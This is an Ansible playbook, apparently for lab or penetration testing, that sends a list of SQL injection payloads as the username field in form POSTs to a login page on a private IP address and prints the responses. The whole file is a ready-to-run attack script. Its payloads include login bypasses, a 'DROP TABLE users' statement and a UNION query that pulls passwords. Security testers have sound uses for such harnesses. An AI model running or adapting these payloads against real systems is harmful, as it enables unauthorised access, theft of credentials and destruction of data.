---
- name: Web Attack Test
  hosts: localhost
  gather_facts: no
  
  vars:
    attack_servers:
      - 192.168.55.5
      
    sql_payloads:
      - "' OR 1=1--"
      - "'; DROP TABLE users;--"
      - "' UNION SELECT password FROM users--"
      - "' OR '1'='1"
      - "\" OR \"1\"=\"1"
      - "' OR 1=1--"
      - "' AND 1=1--"
      - "' OR 'a'='a"
      - "\" OR \"x\"=\"x"
      - "' OR 1=1#"
      - "' OR 1=1/*"
      - "' OR '1'='1' AND '1'='1"
      - "' OR (1=1 AND 2=2)--"


  tasks:
    - name: Display SQL Injection Test Matrix
      debug:
        msg: "Target Server: {{ attack_servers[0] }} | SQL Payload: {{ item }}"
      loop: "{{ sql_payloads }}"

    - name: Execute SQL Injection Attack Test
      uri:
        url: "http://{{ attack_servers[0] }}/login.php"
        method: POST
        body_format: form-urlencoded
        body:
          username: "{{ item }}"
          password: "test"
        status_code: [200, 403, 500]
        timeout: 5
      register: sqli_test_results
      loop: "{{ sql_payloads }}"
      ignore_errors: yes

    - name: SQL Injection Test Result
      debug:
        msg: "{{ sqli_test_results }}"
